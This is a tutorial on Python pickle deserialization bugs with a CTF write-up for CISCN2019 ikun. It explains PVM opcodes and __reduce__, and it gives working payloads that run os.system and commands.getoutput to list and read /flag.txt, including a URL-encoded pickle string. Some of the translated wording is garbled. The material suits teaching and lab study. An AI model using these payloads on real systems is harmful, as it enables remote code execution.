Python Pickle deserialization vulnerability

Foreword:

I made a topic of [CISCN2019]ikun when I was doing the question, which suggested that the knowledge point of the investigation was Python Pickle. The previous contact was about PHP deserialization. This time I will learn about the Python Pickle deserialization vulnerability.

Category: Tag:

Basic knowledge

0x00: Pickle/CPickle
Pickle or cPickle has the same function as serialize and unserialize of PHP. The two are only implemented in different languages. One is implemented in pure Python and the other is implemented in C. The function calls are basically the same, but the performance of the cPickle library is better, and then pickle Library to demonstrate.

0x01: Pickle library and functions
Pickle is a standard module of the python language, which implements basic data serialization and deserialization.
The pickle module is serialized in binary form and saved to a file (the suffix of the saved file is .pkl) and cannot be opened directly for preview.

Function Description
dumps Object deserialization to bytes object
dump Deserialize the object to a file object and save it to a file
loads Deserialize from bytes object
load Object deserialization, read data from file

Let’s look at the role of these functions through a few examples:

dump/load

#Serialization
pickle.dump(obj, file, protocol=None,)
obj represents the object to be encapsulated (required parameter)
file represents the file object to be written by obj
Open in binary writable mode, ie wb (required parameter)
#Deserialization
pickle.load(file, *, fix_imports=True, encoding=”ASCII”, errors=”strict”, buffers=None)
Read the archived object in the file file
Open in binary readable mode, namely rb (required parameter)

(Imitate the example of Master Epicccal)

pickle python
pickle python

dumps/loads

#Serialization
pickle.dumps(obj, protocol=None,*,fix_imports=True)
The dumps() method does not need to be written to the file, and directly returns a serialized bytes object.
#Deserialization
pickle.loads(bytes_object, *,fix_imports=True, encoding=”ASCII”. errors=”strict”)
The loads() method reads the serialized information directly from the bytes object instead of reading it from the file.

python pickle tutorial
python pickle tutorial

When converting in the form of strings in python2, what do these serialized strings mean, and what rules are they generated according to? This involves PVM, because it is the most fundamental process of Python serialization and deserialization s things.

0x02: The role of PVM

For Python, it can run programs directly from the source code. The Python interpreter compiles the source code into bytecode, and then forwards the compiled bytecode to the Python virtual machine for execution. In general, the role of PVM is an interpretation engine used to interpret bytecode.

0x03: PVM execution process
When running a Python program, PVM performs two steps.

PVM will compile the source code into bytecode

Bytecode is a specific form of Python. It is not a binary machine code and needs to be further compiled before it can be executed by the machine. If the Python process has write permission on the host, it will save the program bytecode as a .pyc A file with an extension. If there is no write permission, the Python process will generate bytecode in memory, which will be automatically discarded after the program is executed.

The Python process will forward the compiled bytecode to the PVM (Python Virtual Machine), and the PVM will iteratively execute the bytecode instructions until all operations are completed.
0x04: The relationship between PVM and Pickle module

Pickle is a stack-based programming language with different writing methods, and its essence is a lightweight PVM.

This lightweight PVM consists of three parts, and its functions are as follows:

Instruction processor:

Read the opcode and parameters from the data stream, and interpret them. The instruction processor will execute this process cyclically, constantly changing the value of the stack and memo area until it encounters the end symbol. At this time, the value that finally stays on the top of the stack will be returned as the deserialized object.

Stack:

Implemented by Python list, as a temporary storage area in the process of stream data processing, the deserialization operation of the data stream is completed during the continuous in and out of the stack, and the deserialization result is finally generated on the top of the stack.

Memo:

It is implemented by Python’s dictionary (dict), which can be regarded as a data index or tag, which provides storage functions for the entire life cycle of PVM. In simple terms, it is to store the deserialized data in the form of key-value in memo for later use.

Need to focus on the readable opcodes of the instruction processor, and list a few of the more important ones:

c: Read the content of this line as the module name module, read the content of the next line as the object name object, and then push module.object as a callable object onto the stack
(: Push a tag object onto the stack to determine where the command is to be executed. This tag is often used with the t instruction to generate a tuple
S: followed by a string, PVM will read the content in the quotation marks until it meets a newline character, and then push the read content onto the stack
t: Keep popping data from the stack, the ejection sequence is the same as when pushing the stack, until the left parenthesis is popped. At this time, the popped content forms a tuple, and then the tuple will be pushed onto the stack
R: Pop all the tuples and callable objects previously pushed onto the stack, and then use the tuple as the object of the callable parameters and execute the object. Finally push the result onto the stack
.: End the entire Pickle deserialization process
These six symbols are the most commonly used opcodes in Pickle serialization, which can be understood in conjunction with the picture below.

python pickle dictionary
python pickle dictionary

Deserialization analysis
Combine the above examples for analysis。

The entire serialization process can be divided into three steps

Elevate all attributes from the object
All module names and class names written to the object
Write key-value pairs of all attributes of the object
The process of deserialization is the reverse process of the serialization process.

0x06: Pickle/CPickle deserialization vulnerability analysis
Deserialization vulnerabilities appear in the __reduce__() magic function, which is similar to the __wakeup() magic method in PHP, because such functions are automatically called whenever the deserialization process starts or ends. And this happens to be where deserialization vulnerabilities often appear.

And in the process of deserialization, because the programming language needs to parse out its own unique language data structure based on the deserialized string, it is necessary to execute the parsed structure internally. If there is a problem in the deserialization process, it may directly cause RCE vulnerabilities.

In addition, pickle.loads will solve the import problem, and automatically try to import modules that are not imported. In other words, the code execution and command execution functions of the entire python standard library can be used.

Finally, let’s take a look at this magic function

__reduce__()

When the __reduce__() function returns a tuple, the first element is a callable object, which will be called when the object is created. The second element is the parameter of the callable object, which is also a tuple. This is similar to the function of the R opcode in the PVM we mentioned above, you can compare it:

Pop all the tuples and callable objects previously pushed onto the stack, and then use the tuple as the object of the callable parameters and execute the object. Finally push the result onto the stack

In fact, the R opcode is the underlying implementation of the __reduce__() magic function. At the end of the deserialization process, the Python process will automatically call the __reduce__() magic method. If the parameters of the called function can be controlled, the Python process You can execute malicious code.

note:

In python2, only built-in classes have the __reduce__ method, that is, the class declared with class A (object), but in python3 it is already built-in classes by default

0x06: Deserialization exploit
Where the vulnerability may appear:

When parsing authentication token and session
Pickle the object and store it as a disk file
Pickle the object and transfer it on the network
Parameters passed to the program
Command execution

#Imitating the example of the master Epicccal
import pickle
import os

class Test2(object):
def __reduce__(self):
#Parameters of the called function
cmd = “/usr/bin/id”
return (os.system,(cmd,))

if __name__ == “__main__”:
test = Test2()
#Perform serialization operations
result1 = pickle.dumps(test)
#Execute deserialization operation
result2 = pickle.loads(result1)

# __reduce__() The return value of the magic method:
# return(os.system,(cmd,))
# 1. Satisfaction returns a tuple, there are two parameters in the tuple
# 2. The first parameter is the called function: os.system()
# 3. The second parameter is a tuple: (cmd,), the parameter called cmd in the tuple
# 4. Therefore, the code to be parsed and executed during serialization is os.system(“/usr/bin/id”)

python pickle dump
python pickle dump

Topic training
0x00:[CISCN2019 Division Day1 Web2]ikun
The previous steps will not be described in detail, here we directly start with the Pickle deserialization vulnerability

Found a hint in the settings.py file, decode unicode

pickle load
pickle load

Observe the source code and find that the backdoor is in Admin.py

pickling in python
pickling in python

self.render(‘form.html’, res=p, member=1)
The meaning of this code is to find the template file, render it, and display the page

Take a look at the form.html page

what is pickle
what is pickle

Explain that the incoming can be directly echoed, and custom classes can be serialized and deserialized, so there is a Pickle deserialization vulnerability, then we can construct a payload serialized by pickle.dumps, It can be parsed to read flag or other information.

To construct the payload, you can use the method __reduce__(self), first get the location of the flag file, and then read it

But there are a few things to note:

#os.system and os.popen
os.system calls the system command, exits after completion, the return result is the command execution status, generally 0
os.popen() cannot read the return value of the program execution

These two functions will only be displayed when they are output by print. If they are returned by return, the results will not be displayed.

Checked the information and found

pickling python
pickling python

The function commands.getoutput() can be used instead to construct the payload

# coding=utf8 import pickle import urllib import commands class payload(object): def __reduce__(self): return (commands.getoutput,(‘ls /’,)) a = payload() print urllib.quote(pickle.dumps(a)) #ccommands%0Agetoutput%0Ap0%0A%28S%27ls%20/%27%0Ap1%0Atp2%0ARp3%0A.

pickle in python
pickle in python

Find the flag.txt file, then just read it

return (commands.getoutput,(‘cat /flag.txt’,))

But many times you need to execute multiple functions or multiple instructions at once, you can’t just use __reduce__
To solve the problem, reduce can only execute one function at a time, and when exec is disabled, multiple instructions cannot be executed at a time.

 

Reviews

There are no reviews yet.

Be the first to review “Python Pickle deserialization vulnerability”

Your email address will not be published. Required fields are marked *